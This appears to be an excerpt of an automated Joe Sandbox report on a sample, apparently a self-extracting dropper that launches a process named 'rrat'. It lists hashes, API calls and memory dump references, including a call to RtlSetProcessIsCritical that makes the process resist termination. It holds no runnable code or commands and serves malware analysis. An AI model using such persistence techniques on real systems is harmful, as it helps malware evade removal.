                                                              Function 00E92CB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: 9fbcdcf3120d393296128ff050c86e0c29e56599c6e9eda97d387358bcbcd34d
                                                              • Instruction ID: 0209069743b2d244ac693c4584795c78c093bdf7fc79e6c3a1b17d43cbd26310
                                                              • Opcode Fuzzy Hash: 9fbcdcf3120d393296128ff050c86e0c29e56599c6e9eda97d387358bcbcd34d
                                                              • Instruction Fuzzy Hash: C5019272600248BFDF018F16EC84E967FA8F74D354F001439FA05BA371C2229C559B91
                                                              Function 00E92BF6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E92C0C
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E92C48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: 14d0b4df5af26fb80855646a0d68bd0d8cf91ef9b4aa948404c0ba98285844c0
                                                              • Instruction ID: afd7ccd5cd06d641add2d5431bc3aaf42fcce90b7d4c96f8283dce881de0ed1f
                                                              • Opcode Fuzzy Hash: 14d0b4df5af26fb80855646a0d68bd0d8cf91ef9b4aa948404c0ba98285844c0
                                                              • Instruction Fuzzy Hash: CFF0EC75401224B7CF206B518C05EEA77E8DF29745B015415FD4975142DA60DC41CBF1
                                                              Function 00E9E33E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: c473ededd4b5f231787ad5e923ecbfe23fc31c8736d218f3f9b2a250fc0429ba
                                                              • Instruction ID: 8f2d2b249839e77e8406537970a3eea259c19911e50bbbf0d63073855b00635f
                                                              • Opcode Fuzzy Hash: c473ededd4b5f231787ad5e923ecbfe23fc31c8736d218f3f9b2a250fc0429ba
                                                              • Instruction Fuzzy Hash: 81A16672A003869FEF25CE18C8917AEBBE1EF55318F19516DE694BB382E234DD41C750
                                                              Function 00E827B2 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00E82858
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800), ref: 00E8289C
                                                              • SetFileTime.KERNEL32(?,?,?,00000000), ref: 00E8291D
                                                              • CloseHandle.KERNEL32(?), ref: 00E82924
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: 9559c15082370fd4cccdbccbe73c448e0f786e94808219bcaca56aa5f04a0cf3
                                                              • Instruction ID: e04675da9ad0f9f7cbbb01e632105b06f7f5d176576b0930847f331919c02c46
                                                              • Opcode Fuzzy Hash: 9559c15082370fd4cccdbccbe73c448e0f786e94808219bcaca56aa5f04a0cf3
                                                              • Instruction Fuzzy Hash: 9A41E030248380AAEB25EF24CC45FAABBE4AF85704F04091DF6DDA31D0D674EA4CD752
                                                              Function 00EA1308 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,6AE85006,00E9905E,00000000,00000000,00E9A093,?,00E9A093,?,00000001,00E9905E,6AE85006,00000001,00E9A093,00E9A093), ref: 00EA1355
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EA13DE
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA13F0
                                                              • __freea.LIBCMT ref: 00EA13F9
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 8875755e58274e4c90adbfff3637c7de8fd65c5756e29a3e2aab2127be917b73
                                                              • Instruction ID: 6ef7bb1a0b0db969e939399037eaaf2ad21dbe481befcadb9da96b3c28fe353b
                                                              • Opcode Fuzzy Hash: 8875755e58274e4c90adbfff3637c7de8fd65c5756e29a3e2aab2127be917b73
                                                              • Instruction Fuzzy Hash: FE31DF72A0021AAFDF249F64CC45DAF3BA5EB49314F0501A8FC04EB250EB35ED59CB90
                                                              Function 00E8F883 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00E8F886
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E8F895
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E8F8A3
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E8F8B1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 1e27a9fb2dd4a5a7fbdcfb8415abde03f3c98b4b7677a91bc8ec497d254581fe
                                                              • Instruction ID: 6d513d003270d1955738f7c4a473badbd0984877b37cd4f6dc52a3e8f5822cd1
                                                              • Opcode Fuzzy Hash: 1e27a9fb2dd4a5a7fbdcfb8415abde03f3c98b4b7677a91bc8ec497d254581fe
                                                              • Instruction Fuzzy Hash: 5EE08C71942771AFD3A01B62AC4CF8A3AA4AB09712F050161FA05BA2D1C67084088B90
                                                              Function 00E9FB38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9FCA4
                                                                • Part of subcall function 00E9D96C: IsProcessorFeaturePresent.KERNEL32(00000017,00E9D95B,00000003,?,00000000,00E9D720,00000000,00000016,?,?,00E9D968,00000000,00000000,00000000,00000000,00000000), ref: 00E9D96E
                                                                • Part of subcall function 00E9D96C: GetCurrentProcess.KERNEL32(C0000417,?,00000003,00E9E188), ref: 00E9D990
                                                                • Part of subcall function 00E9D96C: TerminateProcess.KERNEL32(00000000,?,00000003,00E9E188), ref: 00E9D997
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 04a8c1315428eb77e5661f47ed1524956a01f530d4904b9d9e4da6d5b0807b3e
                                                              • Instruction ID: 85352de58d31d920cf178b3cc10d91ca109a632950092c14ca3a774257e7b400
                                                              • Opcode Fuzzy Hash: 04a8c1315428eb77e5661f47ed1524956a01f530d4904b9d9e4da6d5b0807b3e
                                                              • Instruction Fuzzy Hash: EF518D72E0021AAFDF14DFA8C881AADFBF5EF48314F24917AE854F7340E6319A018B50
                                                              Function 00E82E7E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: ee27a419c0e6f513f4b91ce8a0b5b64f7f8ca0b0a56611310b7316463f2eddf9
                                                              • Instruction ID: 81ce393dc3f0c39c9e59248e4e832c7c5f9a917ba3026acecf082e74e83705e2
                                                              • Opcode Fuzzy Hash: ee27a419c0e6f513f4b91ce8a0b5b64f7f8ca0b0a56611310b7316463f2eddf9
                                                              • Instruction Fuzzy Hash: 02312832748311AA8A30BB549902A7BB3F4EF91B58F15A40EFF8D77180E7229D46D361
                                                              Function 00E8E80B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,00E8EA66,00000000,?), ref: 00E8E909
                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 00E8E913
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ShowText
                                                              • String ID: 1
                                                              • API String ID: 1551406749-1475023258
                                                              • Opcode ID: dbf927ce8bc235460ed130c4f67f601348d471c09927c08ebda42f3af659de6c
                                                              • Instruction ID: 6980ddda8df1d704d4d534f1b788a2ab978263cfb8a36026c4d9e32ebee9ec4f
                                                              • Opcode Fuzzy Hash: dbf927ce8bc235460ed130c4f67f601348d471c09927c08ebda42f3af659de6c
                                                              • Instruction Fuzzy Hash: B1315C7260071AAFC709EF65EC84A2ABBE8BF8D304B14045DF549A7360DF61BC05CBA1
                                                              Function 00E9ECF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: x7
                                                              • API String ID: 269201875-374306512
                                                              • Opcode ID: efb26f161a85536b87cbacafdb247f78bf9276994478757c688f85364d1b2643
                                                              • Instruction ID: 2d4a970a43d288df3a8dc6ee3b3b7049916c1d3be6168e773217c9bff9647541
                                                              • Opcode Fuzzy Hash: efb26f161a85536b87cbacafdb247f78bf9276994478757c688f85364d1b2643
                                                              • Instruction Fuzzy Hash: 751108B1A002509FEF64DF39AD86B5633D4A780774F982626FA28FF3D0EB70D8454284
                                                              Function 00EA04CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E9E105: GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                                • Part of subcall function 00E9E105: _free.LIBCMT ref: 00E9E13C
                                                                • Part of subcall function 00E9E105: SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                                • Part of subcall function 00E9E105: _abort.LIBCMT ref: 00E9E183
                                                              • _abort.LIBCMT ref: 00EA0500
                                                              • _free.LIBCMT ref: 00EA0534
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: @;
                                                              • API String ID: 289325740-3452451375
                                                              • Opcode ID: 61015cfa96421d4c2e22a9312a236f314a1a536771565ed43bb7a8af9acf728c
                                                              • Instruction ID: 3fd6c7dc1a5c2d6c984eb41d55e4599a540573eeef8326f06bdf6025daa0fe24
                                                              • Opcode Fuzzy Hash: 61015cfa96421d4c2e22a9312a236f314a1a536771565ed43bb7a8af9acf728c
                                                              • Instruction Fuzzy Hash: E3019B71D057259FCB319F6D984255EB3B0BF0AB25B15120AE4247B281C730BE41CFC5
                                                              Function 00E880E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: z%s%02d$z%s%d
                                                              • API String ID: 589789837-468824935
                                                              • Opcode ID: 302f7109c5f9fb98198f6a8d1b9863b17e0c878d6ea97fe1cba6634e02c3bf33
                                                              • Instruction ID: edd18aeacde6a6f0af0b0c7332094d273a71c6d4bbd98e5f2e0d7097b861e49e
                                                              • Opcode Fuzzy Hash: 302f7109c5f9fb98198f6a8d1b9863b17e0c878d6ea97fe1cba6634e02c3bf33
                                                              • Instruction Fuzzy Hash: 33F090699001086ADF04BA548E07CDA77AAEB9A344B40B025FE1DBB151EE71EE5687A0
                                                              Function 00E8F290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00E8F2AD
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00E8F2BA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID: f2
                                                              • API String ID: 1378638983-4265717505
                                                              • Opcode ID: e77db8538f9ac261d96639fbdf61affa9588b1b19183d0c569aae926ce4e388a
                                                              • Instruction ID: 925ee783b4674ec1421db9473a50fe893ab541c578836321d352997ef49de8de
                                                              • Opcode Fuzzy Hash: e77db8538f9ac261d96639fbdf61affa9588b1b19183d0c569aae926ce4e388a
                                                              • Instruction Fuzzy Hash: 7FF01C3600410DBFCF016F69DC58C9E3F65FB99321B008525F91A69171D732D920EF50
                                                              Function 00E848FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00E840B5,?), ref: 00E84903
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E840B5,?), ref: 00E84911
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 954ed53ad941b6cd637c7b05f5d9f807e2e826d90d2f679ff917191614b28135
                                                              • Instruction ID: 307e5e0c3415089a6db3a74b660f08c296ef24690524bb31c55fdca94372252f
                                                              • Opcode Fuzzy Hash: 954ed53ad941b6cd637c7b05f5d9f807e2e826d90d2f679ff917191614b28135
                                                              • Instruction Fuzzy Hash: 56C012716443119EF63027326D4DB833D445B46B11F050494B145BA1D0DEE5E448C760

                                                              Execution Graph

                                                              Execution Coverage:30.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 1747 23f2810 1748 23f2818 RtlSetProcessIsCritical 1747->1748 1750 23f288c 1748->1750

                                                              Executed Functions

                                                              Function 023F2810 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 30 23f2810-23f2853 32 23f285b-23f288a RtlSetProcessIsCritical 30->32 33 23f288c 32->33 34 23f2891-23f28aa 32->34 33->34
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 023F287D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088975855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_23f0000_rrat.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 7549e5bd995e968300265f7547af890d98d2283f4ffe41fca360826b183aa1e4
                                                              • Instruction ID: 236239a504a254de5a3b1c39aec55b0bad1277ae097d2fc26843ba2afd9ff20f
                                                              • Opcode Fuzzy Hash: 7549e5bd995e968300265f7547af890d98d2283f4ffe41fca360826b183aa1e4
                                                              • Instruction Fuzzy Hash: 121110B58046488FCB20DF9AD484BDEBFF4FF88310F208059D958A3250C775A944CFA1
                                                              Function 023F2818 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 36 23f2818-23f288a RtlSetProcessIsCritical 38 23f288c 36->38 39 23f2891-23f28aa 36->39 38->39
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 023F287D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088975855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_23f0000_rrat.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 6cf7a827d317b0753bd73813e326d42821fef1ad9c6ab11cc4d76442d4514e83
                                                              • Instruction ID: 4faa352ed643164d003aadaf6dc4fc8016f61002088ca51feee09b37bb615921
